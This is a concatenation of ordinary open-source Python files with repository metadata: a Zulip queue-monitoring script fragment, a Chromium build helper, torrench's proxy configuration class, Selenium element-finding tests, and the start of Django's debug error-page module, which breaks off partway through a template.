subprocess.check_output(['/usr/sbin/rabbitmqctl', 'list_queues', 'name', 'messages', 'consumers'], universal_newlines=True) queue_counts_rabbitmqctl = {} queues_with_consumers = [] for line in list_queues_output.split("\n"): line = line.strip() m = pattern.match(line) if m: queue = m.group(1) count = int(m.group(2)) consumers = int(m.group(3)) queue_counts_rabbitmqctl[queue] = count if consumers > 0 and not queue.startswith("notify_tornado"): queues_with_consumers.append(queue) queue_stats_dir = subprocess.check_output([os.path.join(ZULIP_PATH, 'scripts/get-django-setting'), 'QUEUE_STATS_DIR'], universal_newlines=True).strip() queue_stats: Dict[str, Dict[str, Any]] = {} queues_to_check = set(normal_queues).intersection(set(queues_with_consumers)) for queue in queues_to_check: fn = queue + ".stats" file_path = os.path.join(queue_stats_dir, fn) if not os.path.exists(file_path): queue_stats[queue] = {} continue with open(file_path) as f: try: queue_stats[queue] = json.load(f) except json.decoder.JSONDecodeError: queue_stats[queue] = {} results = [] for queue_name, stats in queue_stats.items(): results.append(analyze_queue_stats(queue_name, stats, queue_counts_rabbitmqctl[queue_name])) results.extend(check_other_queues(queue_counts_rabbitmqctl)) status = max(result['status'] for result in results) now = int(time.time()) if status > 0: queue_error_template = "queue {} problem: {}:{}" error_message = '; '.join( queue_error_template.format(result['name'], states[result['status']], result['message']) for result in results if result['status'] > 0 ) print(f"{now}|{status}|{states[status]}|{error_message}") else: print(f"{now}|{status}|{states[status]}|queues normal")
apache-2.0
iansf/engine
build/find_isolated_tests.py
142
2261
#!/usr/bin/env python # Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Scans build output directory for .isolated files, calculates their SHA1 hashes, stores final list in JSON document and then removes *.isolated files found (to ensure no stale *.isolated stay around on the next build). Used to figure out what tests were build in isolated mode to trigger these tests to run on swarming. For more info see: https://sites.google.com/a/chromium.org/dev/developers/testing/isolated-testing """ import glob import hashlib import json import optparse import os import re import sys def hash_file(filepath): """Calculates the hash of a file without reading it all in memory at once.""" digest = hashlib.sha1() with open(filepath, 'rb') as f: while True: chunk = f.read(1024*1024) if not chunk: break digest.update(chunk) return digest.hexdigest() def main(): parser = optparse.OptionParser( usage='%prog --build-dir <path> --output-json <path>', description=sys.modules[__name__].__doc__) parser.add_option( '--build-dir', help='Path to a directory to search for *.isolated files.') parser.add_option( '--output-json', help='File to dump JSON results into.') options, _ = parser.parse_args() if not options.build_dir: parser.error('--build-dir option is required') if not options.output_json: parser.error('--output-json option is required') result = {} # Get the file hash values and output the pair. pattern = os.path.join(options.build_dir, '*.isolated') for filepath in sorted(glob.glob(pattern)): test_name = os.path.splitext(os.path.basename(filepath))[0] if re.match(r'^.+?\.\d$', test_name): # It's a split .isolated file, e.g. foo.0.isolated. Ignore these. continue # TODO(csharp): Remove deletion once the isolate tracked dependencies are # inputs for the isolated files. sha1_hash = hash_file(filepath) os.remove(filepath) result[test_name] = sha1_hash with open(options.output_json, 'wb') as f: json.dump(result, f) return 0 if __name__ == '__main__': sys.exit(main())
bsd-3-clause
kryptxy/torrench
torrench/utilities/Config.py
1
4151
""" Config module.""" import logging import os from configparser import SafeConfigParser from torrench.utilities.Common import Common class Config(Common): r""" Config class. This class checks for config file's presence. Also, this class manages TPB/KAT proxies; That is, obtains TPB/KAT URL and fetches proxies thorugh those URL. Proxies are stored as list and returned. By default, Config files is checked in $XDG_CONFIG_HOME/torrench/ and fallback to $HOME/.config/torrench/ directory (linux) For windows, default location is ~\.config\torrench This class inherits Common class. """ def __init__(self): """Initialisations.""" Common.__init__(self) self.config = SafeConfigParser() self.config_dir = os.getenv('XDG_CONFIG_HOME', os.path.expanduser(os.path.join('~', '.config'))) self.full_config_dir = os.path.join(self.config_dir, 'torrench') self.config_file_name = "config.ini" self.config_file_name_new = "config.ini.new" self.config_file = os.path.join(self.full_config_dir, self.config_file_name) self.config_file_new = os.path.join(self.full_config_dir, self.config_file_name_new) self.url = None self.name = None self.urllist = [] self.logger = logging.getLogger('log1') def file_exists(self): """To check whether config.ini file exists and is enabled or not.""" if os.path.isfile(self.config_file): self.config.read(self.config_file) enable = self.config.get('Torrench-Config', 'enable') if enable == '1': self.logger.debug("Config file exists and enabled!") return True def update_file(self): try: # Get updated copy of config.ini file. self.logger.debug("Downloading new config.ini file") url = "https://pastebin.com/raw/reymRHSL" self.logger.debug("Download complete. Saving file..") soup = self.http_request(url) res = soup.p.get_text() with open(self.config_file, 'w', encoding="utf-8") as f: f.write(res) self.logger.debug("Saved new file as {}".format(self.config_file)) # Read file and set enable = 1 self.config.read(self.config_file) self.logger.debug("Now enabling file") self.config.set('Torrench-Config', 'enable', '1') # Write changes to config.ini file (self.config_file) with open(self.config_file, 'w', encoding="utf-8") as configfile: self.config.write(configfile) self.logger.debug("File enabled successfull and saved.") print("Config file updated!") self.logger.debug("Config file updated successfully.") except Exception as e: print("Something went wrong. See logs for details.") self.logger.debug("Something gone wrong while updating config file.") self.logger.exception(e) # To get proxies for KAT/TPB/... def get_proxies(self, name): """ Get Proxies. Proxies are read from config.ini file. """ self.logger.debug("getting proxies for '%s'" % (name)) temp = [] self.config.read(self.config_file) name = '{}_URL'.format(name.upper()) self.url = self.config.get('Torrench-Config', name) self.urllist = self.url.split() if name == 'TPB_URL': soup = self.http_request(self.urllist[-1]) link = soup.find_all('td', class_='site') del self.urllist[-1] for i in link: temp.append(i.a["href"]) self.urllist.extend(temp) elif name == "1337X_URL": soup = self.http_request(self.urllist[-1]) link = soup.findAll('td', class_='text-left') del self.urllist[-1] for i in link: temp.append(i.a["href"]) self.urllist.extend(temp) self.logger.debug("got %d proxies!" % (len(self.urllist))) return self.urllist
gpl-3.0
joshuaduffy/selenium
py/test/selenium/webdriver/common/children_finding_tests.py
3
10379
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import unittest from selenium.common.exceptions import NoSuchElementException from selenium.common.exceptions import InvalidSelectorException from selenium.webdriver.common.by import By class ChildrenFindingTests(unittest.TestCase): def test_should_find_element_by_xpath(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") child = element.find_element_by_xpath("select") self.assertEqual(child.get_attribute("id"), "2") def test_should_not_find_element_by_xpath(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_element_by_xpath("select/x") self.fail("Expected NoSuchElementException to have been thrown") except NoSuchElementException as e: pass def test_finding_dot_slash_elements_on_element_by_xpath_should_find_not_top_level_elements(self): self._load_simple_page() parent = self.driver.find_element_by_id("multiline") children = parent.find_elements_by_xpath("./p") self.assertEqual(1, len(children)) self.assertEqual("A div containing", children[0].text) def test_should_find_elements_by_xpath(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") children = element.find_elements_by_xpath("select/option") self.assertEqual(len(children), 8); self.assertEqual(children[0].text, "One") self.assertEqual(children[1].text, "Two") def test_should_not_find_elements_by_xpath(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") children = element.find_elements_by_xpath("select/x") self.assertEqual(len(children), 0) def test_finding_elements_on_element_by_xpath_should_find_top_level_elements(self): self._load_simple_page() parent = self.driver.find_element_by_id("multiline") all_para_elements = self.driver.find_elements_by_xpath("//p") children = parent.find_elements_by_xpath("//p") self.assertEqual(len(all_para_elements), len(children)) def test_should_find_element_by_name(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") child = element.find_element_by_name("selectomatic") self.assertEqual(child.get_attribute("id"), "2") def test_should_find_elements_by_name(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") children = element.find_elements_by_name("selectomatic") self.assertEqual(len(children), 2) def test_should_find_element_by_id(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") child = element.find_element_by_id("2") self.assertEqual(child.get_attribute("name"), "selectomatic") def test_should_find_elements_by_id(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") child = element.find_elements_by_id("2") self.assertEqual(len(child), 2) def test_should_find_element_by_id_when_multiple_matches_exist(self): self._load_page("nestedElements") element = self.driver.find_element_by_id("test_id_div") child = element.find_element_by_id("test_id") self.assertEqual(child.text, "inside") def test_should_find_element_by_id_when_no_match_in_context(self): self._load_page("nestedElements") element = self.driver.find_element_by_id("test_id_div") try: element.find_element_by_id("test_id_out") self.fail("Expected NoSuchElementException to have been thrown") except NoSuchElementException as e: pass def test_should_find_element_by_link_text(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("div1") child = element.find_element_by_link_text("hello world") self.assertEqual(child.get_attribute("name"), "link1") def test_should_find_elements_by_link_text(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("div1") children = element.find_elements_by_link_text("hello world") self.assertEqual(len(children), 2) self.assertEqual("link1", children[0].get_attribute("name")) self.assertEqual("link2", children[1].get_attribute("name")) def test_should_find_element_by_class_name(self): self._load_page("nestedElements") parent = self.driver.find_element_by_name("classes") element = parent.find_element_by_class_name("one") self.assertEqual("Find me", element.text) def test_should_find_elements_by_class_name(self): self._load_page("nestedElements") parent = self.driver.find_element_by_name("classes") elements = parent.find_elements_by_class_name("one") self.assertEqual(2, len(elements)) def test_should_find_element_by_tag_name(self): self._load_page("nestedElements") parent = self.driver.find_element_by_name("div1") element = parent.find_element_by_tag_name("a") self.assertEqual("link1", element.get_attribute("name")) def test_should_find_elements_by_tag_name(self): self._load_page("nestedElements") parent = self.driver.find_element_by_name("div1") elements = parent.find_elements_by_tag_name("a") self.assertEqual(2, len(elements)) def test_should_be_able_to_find_an_element_by_css_selector(self): self._load_page("nestedElements") parent = self.driver.find_element_by_name("form2") element = parent.find_element_by_css_selector('*[name="selectomatic"]') self.assertEqual("2", element.get_attribute("id")) def test_should_be_able_to_find_multiple_elements_by_css_selector(self): self._load_page("nestedElements") parent = self.driver.find_element_by_name("form2") elements = parent.find_elements_by_css_selector( '*[name="selectomatic"]') self.assertEqual(2, len(elements)) def test_should_throw_an_error_if_user_passes_in_integer(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_element(By.ID, 333333) self.fail("_should have thrown _web_driver Exception") except InvalidSelectorException: pass #_this is expected def test_should_throw_an_error_if_user_passes_in_tuple(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_element((By.ID, 333333)) self.fail("_should have thrown _web_driver Exception") except InvalidSelectorException: pass #_this is expected def test_should_throw_an_error_if_user_passes_inNone(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_element(By.ID, None) self.fail("_should have thrown _web_driver Exception") except InvalidSelectorException: pass #_this is expected def test_should_throw_an_error_if_user_passes_in_invalid_by(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_element("css", "body") self.fail("_should have thrown _web_driver Exception") except InvalidSelectorException: pass #_this is expected def test_should_throw_an_error_if_user_passes_in_integer_when_find_elements(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_elements(By.ID, 333333) self.fail("_should have thrown _web_driver Exception") except InvalidSelectorException: pass #_this is expected def test_should_throw_an_error_if_user_passes_in_tuple_when_find_elements(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_elements((By.ID, 333333)) self.fail("_should have thrown _web_driver Exception") except InvalidSelectorException: pass #_this is expected def test_should_throw_an_error_if_user_passes_inNone_when_find_elements(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_elements(By.ID, None) self.fail("should have thrown webdriver Exception") except InvalidSelectorException: pass #_this is expected def test_should_throw_an_error_if_user_passes_in_invalid_by_when_find_elements(self): self._load_page("nestedElements") element = self.driver.find_element_by_name("form2") try: element.find_elements("css", "body") self.fail("Should have thrown WebDriver Exception") except InvalidSelectorException: pass #_this is expected def _page_url(self, name): return self.webserver.where_is(name + '.html') def _load_simple_page(self): self._load_page("simpleTest") def _load_page(self, name): self.driver.get(self._page_url(name))
apache-2.0
tayfun/django
django/views/debug.py
44
46856
from __future__ import unicode_literals import re import sys import types from django.conf import settings from django.core.urlresolvers import Resolver404, resolve from django.http import HttpResponse, HttpResponseNotFound from django.template import Context, Engine, TemplateDoesNotExist from django.template.defaultfilters import force_escape, pprint from django.utils import lru_cache, six, timezone from django.utils.datastructures import MultiValueDict from django.utils.encoding import force_bytes, smart_text from django.utils.module_loading import import_string from django.utils.translation import ugettext as _ # Minimal Django templates engine to render the error templates # regardless of the project's TEMPLATES setting. DEBUG_ENGINE = Engine(debug=True) HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE') CLEANSED_SUBSTITUTE = '********************' def linebreak_iter(template_source): yield 0 p = template_source.find('\n') while p >= 0: yield p + 1 p = template_source.find('\n', p + 1) yield len(template_source) + 1 class CallableSettingWrapper(object): """ Object to wrap callable appearing in settings * Not to call in the debug page (#21345). * Not to break the debug page if the callable forbidding to set attributes (#23070). """ def __init__(self, callable_setting): self._wrapped = callable_setting def __repr__(self): return repr(self._wrapped) def cleanse_setting(key, value): """Cleanse an individual setting key/value of sensitive content. If the value is a dictionary, recursively cleanse the keys in that dictionary. """ try: if HIDDEN_SETTINGS.search(key): cleansed = CLEANSED_SUBSTITUTE else: if isinstance(value, dict): cleansed = {k: cleanse_setting(k, v) for k, v in value.items()} else: cleansed = value except TypeError: # If the key isn't regex-able, just return as-is. cleansed = value if callable(cleansed): # For fixing #21345 and #23070 cleansed = CallableSettingWrapper(cleansed) return cleansed def get_safe_settings(): "Returns a dictionary of the settings module, with sensitive settings blurred out." settings_dict = {} for k in dir(settings): if k.isupper(): settings_dict[k] = cleanse_setting(k, getattr(settings, k)) return settings_dict def technical_500_response(request, exc_type, exc_value, tb, status_code=500): """ Create a technical server error response. The last three arguments are the values returned from sys.exc_info() and friends. """ reporter = ExceptionReporter(request, exc_type, exc_value, tb) if request.is_ajax(): text = reporter.get_traceback_text() return HttpResponse(text, status=status_code, content_type='text/plain') else: html = reporter.get_traceback_html() return HttpResponse(html, status=status_code, content_type='text/html') @lru_cache.lru_cache() def get_default_exception_reporter_filter(): # Instantiate the default filter for the first time and cache it. return import_string(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)() def get_exception_reporter_filter(request): default_filter = get_default_exception_reporter_filter() return getattr(request, 'exception_reporter_filter', default_filter) class ExceptionReporterFilter(object): """ Base for all exception reporter filter classes. All overridable hooks contain lenient default behaviors. """ def get_post_parameters(self, request): if request is None: return {} else: return request.POST def get_traceback_frame_variables(self, request, tb_frame): return list(tb_frame.f_locals.items()) class SafeExceptionReporterFilter(ExceptionReporterFilter): """ Use annotations made by the sensitive_post_parameters and sensitive_variables decorators to filter out sensitive information. """ def is_active(self, request): """ This filter is to add safety in production environments (i.e. DEBUG is False). If DEBUG is True then your site is not safe anyway. This hook is provided as a convenience to easily activate or deactivate the filter on a per request basis. """ return settings.DEBUG is False def get_cleansed_multivaluedict(self, request, multivaluedict): """ Replaces the keys in a MultiValueDict marked as sensitive with stars. This mitigates leaking sensitive POST parameters if something like request.POST['nonexistent_key'] throws an exception (#21098). """ sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', []) if self.is_active(request) and sensitive_post_parameters: multivaluedict = multivaluedict.copy() for param in sensitive_post_parameters: if param in multivaluedict: multivaluedict[param] = CLEANSED_SUBSTITUTE return multivaluedict def get_post_parameters(self, request): """ Replaces the values of POST parameters marked as sensitive with stars (*********). """ if request is None: return {} else: sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', []) if self.is_active(request) and sensitive_post_parameters: cleansed = request.POST.copy() if sensitive_post_parameters == '__ALL__': # Cleanse all parameters. for k, v in cleansed.items(): cleansed[k] = CLEANSED_SUBSTITUTE return cleansed else: # Cleanse only the specified parameters. for param in sensitive_post_parameters: if param in cleansed: cleansed[param] = CLEANSED_SUBSTITUTE return cleansed else: return request.POST def cleanse_special_types(self, request, value): try: # If value is lazy or a complex object of another kind, this check # might raise an exception. isinstance checks that lazy # MultiValueDicts will have a return value. is_multivalue_dict = isinstance(value, MultiValueDict) except Exception as e: return '{!r} while evaluating {!r}'.format(e, value) if is_multivalue_dict: # Cleanse MultiValueDicts (request.POST is the one we usually care about) value = self.get_cleansed_multivaluedict(request, value) return value def get_traceback_frame_variables(self, request, tb_frame): """ Replaces the values of variables marked as sensitive with stars (*********). """ # Loop through the frame's callers to see if the sensitive_variables # decorator was used. current_frame = tb_frame.f_back sensitive_variables = None while current_frame is not None: if (current_frame.f_code.co_name == 'sensitive_variables_wrapper' and 'sensitive_variables_wrapper' in current_frame.f_locals): # The sensitive_variables decorator was used, so we take note # of the sensitive variables' names. wrapper = current_frame.f_locals['sensitive_variables_wrapper'] sensitive_variables = getattr(wrapper, 'sensitive_variables', None) break current_frame = current_frame.f_back cleansed = {} if self.is_active(request) and sensitive_variables: if sensitive_variables == '__ALL__': # Cleanse all variables for name, value in tb_frame.f_locals.items(): cleansed[name] = CLEANSED_SUBSTITUTE else: # Cleanse specified variables for name, value in tb_frame.f_locals.items(): if name in sensitive_variables: value = CLEANSED_SUBSTITUTE else: value = self.cleanse_special_types(request, value) cleansed[name] = value else: # Potentially cleanse the request and any MultiValueDicts if they # are one of the frame variables. for name, value in tb_frame.f_locals.items(): cleansed[name] = self.cleanse_special_types(request, value) if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper' and 'sensitive_variables_wrapper' in tb_frame.f_locals): # For good measure, obfuscate the decorated function's arguments in # the sensitive_variables decorator's frame, in case the variables # associated with those arguments were meant to be obfuscated from # the decorated function's frame. cleansed['func_args'] = CLEANSED_SUBSTITUTE cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE return cleansed.items() class ExceptionReporter(object): """ A class to organize and coordinate reporting on exceptions. """ def __init__(self, request, exc_type, exc_value, tb, is_email=False): self.request = request self.filter = get_exception_reporter_filter(self.request) self.exc_type = exc_type self.exc_value = exc_value self.tb = tb self.is_email = is_email self.template_info = getattr(self.exc_value, 'template_debug', None) self.template_does_not_exist = False self.postmortem = None # Handle deprecated string exceptions if isinstance(self.exc_type, six.string_types): self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type) self.exc_type = type(self.exc_value) def get_traceback_data(self): """Return a dictionary containing traceback information.""" if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist): self.template_does_not_exist = True self.postmortem = self.exc_value.chain or [self.exc_value] frames = self.get_traceback_frames() for i, frame in enumerate(frames): if 'vars' in frame: frame_vars = [] for k, v in frame['vars']: v = pprint(v) # The force_escape filter assume unicode, make sure that works if isinstance(v, six.binary_type): v = v.decode('utf-8', 'replace') # don't choke on non-utf-8 input # Trim large blobs of data if len(v) > 4096: v = '%s... <trimmed %d bytes string>' % (v[0:4096], len(v)) frame_vars.append((k, force_escape(v))) frame['vars'] = frame_vars frames[i] = frame unicode_hint = '' if self.exc_type and issubclass(self.exc_type, UnicodeError): start = getattr(self.exc_value, 'start', None) end = getattr(self.exc_value, 'end', None) if start is not None and end is not None: unicode_str = self.exc_value.args[1] unicode_hint = smart_text( unicode_str[max(start - 5, 0):min(end + 5, len(unicode_str))], 'ascii', errors='replace' ) from django import get_version c = { 'is_email': self.is_email, 'unicode_hint': unicode_hint, 'frames': frames, 'request': self.request, 'filtered_POST': self.filter.get_post_parameters(self.request), 'settings': get_safe_settings(), 'sys_executable': sys.executable, 'sys_version_info': '%d.%d.%d' % sys.version_info[0:3], 'server_time': timezone.now(), 'django_version_info': get_version(), 'sys_path': sys.path, 'template_info': self.template_info, 'template_does_not_exist': self.template_does_not_exist, 'postmortem': self.postmortem, } # Check whether exception info is available if self.exc_type: c['exception_type'] = self.exc_type.__name__ if self.exc_value: c['exception_value'] = smart_text(self.exc_value, errors='replace') if frames: c['lastframe'] = frames[-1] return c def get_traceback_html(self): "Return HTML version of debug 500 HTTP error page." t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEMPLATE) c = Context(self.get_traceback_data(), use_l10n=False) return t.render(c) def get_traceback_text(self): "Return plain text version of debug 500 HTTP error page." t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEXT_TEMPLATE) c = Context(self.get_traceback_data(), autoescape=False, use_l10n=False) return t.render(c) def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None): """ Returns context_lines before and after lineno from file. Returns (pre_context_lineno, pre_context, context_line, post_context). """ source = None if loader is not None and hasattr(loader, "get_source"): try: source = loader.get_source(module_name) except ImportError: pass if source is not None: source = source.splitlines() if source is None: try: with open(filename, 'rb') as fp: source = fp.read().splitlines() except (OSError, IOError): pass if source is None: return None, [], None, [] # If we just read the source from a file, or if the loader did not # apply tokenize.detect_encoding to decode the source into a Unicode # string, then we should do that ourselves. if isinstance(source[0], six.binary_type): encoding = 'ascii' for line in source[:2]: # File coding may be specified. Match pattern from PEP-263 # (http://www.python.org/dev/peps/pep-0263/) match = re.search(br'coding[:=]\s*([-\w.]+)', line) if match: encoding = match.group(1).decode('ascii') break source = [six.text_type(sline, encoding, 'replace') for sline in source] lower_bound = max(0, lineno - context_lines) upper_bound = lineno + context_lines pre_context = source[lower_bound:lineno] context_line = source[lineno] post_context = source[lineno + 1:upper_bound] return lower_bound, pre_context, context_line, post_context def get_traceback_frames(self): def explicit_or_implicit_cause(exc_value): explicit = getattr(exc_value, '__cause__', None) implicit = getattr(exc_value, '__context__', None) return explicit or implicit # Get the exception and all its causes exceptions = [] exc_value = self.exc_value while exc_value: exceptions.append(exc_value) exc_value = explicit_or_implicit_cause(exc_value) frames = [] # No exceptions were supplied to ExceptionReporter if not exceptions: return frames # In case there's just one exception (always in Python 2, # sometimes in Python 3), take the traceback from self.tb (Python 2 # doesn't have a __traceback__ attribute on Exception) exc_value = exceptions.pop() tb = self.tb if six.PY2 or not exceptions else exc_value.__traceback__ while tb is not None: # Support for __traceback_hide__ which is used by a few libraries # to hide internal frames. if tb.tb_frame.f_locals.get('__traceback_hide__'): tb = tb.tb_next continue filename = tb.tb_frame.f_code.co_filename function = tb.tb_frame.f_code.co_name lineno = tb.tb_lineno - 1 loader = tb.tb_frame.f_globals.get('__loader__') module_name = tb.tb_frame.f_globals.get('__name__') or '' pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file( filename, lineno, 7, loader, module_name, ) if pre_context_lineno is not None: frames.append({ 'exc_cause': explicit_or_implicit_cause(exc_value), 'exc_cause_explicit': getattr(exc_value, '__cause__', True), 'tb': tb, 'type': 'django' if module_name.startswith('django.') else 'user', 'filename': filename, 'function': function, 'lineno': lineno + 1, 'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame), 'id': id(tb), 'pre_context': pre_context, 'context_line': context_line, 'post_context': post_context, 'pre_context_lineno': pre_context_lineno + 1, }) # If the traceback for current exception is consumed, try the # other exception. if six.PY2: tb = tb.tb_next elif not tb.tb_next and exceptions: exc_value = exceptions.pop() tb = exc_value.__traceback__ else: tb = tb.tb_next return frames def format_exception(self): """ Return the same data as from traceback.format_exception. """ import traceback frames = self.get_traceback_frames() tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames] list = ['Traceback (most recent call last):\n'] list += traceback.format_list(tb) list += traceback.format_exception_only(self.exc_type, self.exc_value) return list def technical_404_response(request, exception): "Create a technical 404 error response. The exception should be the Http404." try: error_url = exception.args[0]['path'] except (IndexError, TypeError, KeyError): error_url = request.path_info[1:] # Trim leading slash try: tried = exception.args[0]['tried'] except (IndexError, TypeError, KeyError): tried = [] else: if (not tried # empty URLconf or (request.path == '/' and len(tried) == 1 # default URLconf and len(tried[0]) == 1 and getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin')): return default_urlconf(request) urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF) if isinstance(urlconf, types.ModuleType): urlconf = urlconf.__name__ caller = '' try: resolver_match = resolve(request.path) except Resolver404: pass else: obj = resolver_match.func if hasattr(obj, '__name__'): caller = obj.__name__ elif hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'): caller = obj.__class__.__name__ if hasattr(obj, '__module__'): module = obj.__module__ caller = '%s.%s' % (module, caller) t = DEBUG_ENGINE.from_string(TECHNICAL_404_TEMPLATE) c = Context({ 'urlconf': urlconf, 'root_urlconf': settings.ROOT_URLCONF, 'request_path': error_url, 'urlpatterns': tried, 'reason': force_bytes(exception, errors='replace'), 'request': request, 'settings': get_safe_settings(), 'raising_view_name': caller, }) return HttpResponseNotFound(t.render(c), content_type='text/html') def default_urlconf(request): "Create an empty URLconf 404 error response." t = DEBUG_ENGINE.from_string(DEFAULT_URLCONF_TEMPLATE) c = Context({ "title": _("Welcome to Django"), "heading": _("It worked!"), "subheading": _("Congratulations on your first Django-powered page."), "instructions": _("Of course, you haven't actually done any work yet. " "Next, start your first app by running <code>python manage.py startapp [app_label]</code>."), "explanation": _("You're seeing this message because you have <code>DEBUG = True</code> in your " "Django settings file and you haven't configured any URLs. Get to work!"), }) return HttpResponse(t.render(c), content_type='text/html') # # Templates are embedded in the file so that we know the error handler will # always work even if the template loader is broken. # TECHNICAL_500_TEMPLATE = (""" <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="NONE,NOARCHIVE"> <title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}""" """{% if request %} at {{ request.path_info|escape }}{% endif %}</title> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; } h2 { margin-bottom:.8em; } h2 span { font-size:80%; color:#666; font-weight:normal; } h3 { margin:1em 0 .5em 0; } h4 { margin:0 0 .5em 0; font-weight: normal; } code, pre { font-size: 100%; white-space: pre-wrap; } table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; } tbody td, tbody th { vertical-align:top; padding:2px 3px; } thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; } tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; } table.vars { margin:5px 0 2px 40px; } table.vars td, table.req td { font-family:monospace; } table td.code { width:100%; } table td.code pre { overflow:hidden; } table.source th { color:#666; } table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; } ul.traceback { list-style-type:none; color: #222; } ul.traceback li.frame { padding-bottom:1em; color:#666; } ul.traceback li.user { background-color:#e0e0e0; color:#000 } div.context { padding:10px 0; overflow:hidden; } div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; } div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; } div.context ol li pre { display:inline; } div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; } div.context ol.context-line li span { position:absolute; right:32px; } .user div.context ol.context-line li { background-color:#bbb; color:#000; } .user div.context ol li { color:#666; } div.commands { margin-left: 40px; } div.commands a { color:#555; text-decoration:none; } .user div.commands a { color: black; } #summary { background: #ffc; } #summary h2 { font-weight: normal; color: #666; } #explanation { background:#eee; } #template, #template-not-exist { background:#f6f6f6; } #template-not-exist ul { margin: 0 0 10px 20px; } #template-not-exist .postmortem-section { margin-bottom: 3px; } #unicode-hint { background:#eee; } #traceback { background:#eee; } #requestinfo { background:#f6f6f6; padding-left:120px; } #summary table { border:none; background:transparent; } #requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; } #requestinfo h3 { margin-bottom:-1em; } .error { background: #ffc; } .specific { color:#cc3300; font-weight:bold; } h2 span.commands { font-size:.7em;} span.commands a:link {color:#5E5694;} pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; } .append-bottom { margin-bottom: 10px; } </style> {% if not is_email %} <script type="text/javascript"> //<!-- function getElementsByClassName(oElm, strTagName, strClassName){ // Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com var arrElements = (strTagName == "*" && document.all)? document.all : oElm.getElementsByTagName(strTagName); var arrReturnElements = new Array(); strClassName = strClassName.replace(/\-/g, "\\-"); var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)"); var oElement; for(var i=0; i<arrElements.length; i++){ oElement = arrElements[i]; if(oRegExp.test(oElement.className)){ arrReturnElements.push(oElement); } } return (arrReturnElements) } function hideAll(elems) { for (var e = 0; e < elems.length; e++) { elems[e].style.display = 'none'; } } window.onload = function() { hideAll(getElementsByClassName(document, 'table', 'vars')); hideAll(getElementsByClassName(document, 'ol', 'pre-context')); hideAll(getElementsByClassName(document, 'ol', 'post-context')); hideAll(getElementsByClassName(document, 'div', 'pastebin')); } function toggle() { for (var i = 0; i < arguments.length; i++) { var e = document.getElementById(arguments[i]); if (e) { e.style.display = e.style.display == 'none' ? 'block': 'none'; } } return false; } function varToggle(link, id) { toggle('v' + id); var s = link.getElementsByTagName('span')[0]; var uarr = String.fromCharCode(0x25b6); var darr = String.fromCharCode(0x25bc); s.innerHTML = s.innerHTML == uarr ? darr : uarr; return false; } function switchPastebinFriendly(link) { s1 = "Switch to copy-and-paste view"; s2 = "Switch back to interactive view"; link.innerHTML = link.innerHTML.trim() == s1 ? s2: s1; toggle('browserTraceback', 'pastebinTraceback'); return false; } //--> </script> {% endif %} </head> <body> <div id="summary"> <h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}""" """{% if request %} at {{ request.path_info|escape }}{% endif %}</h1> <pre 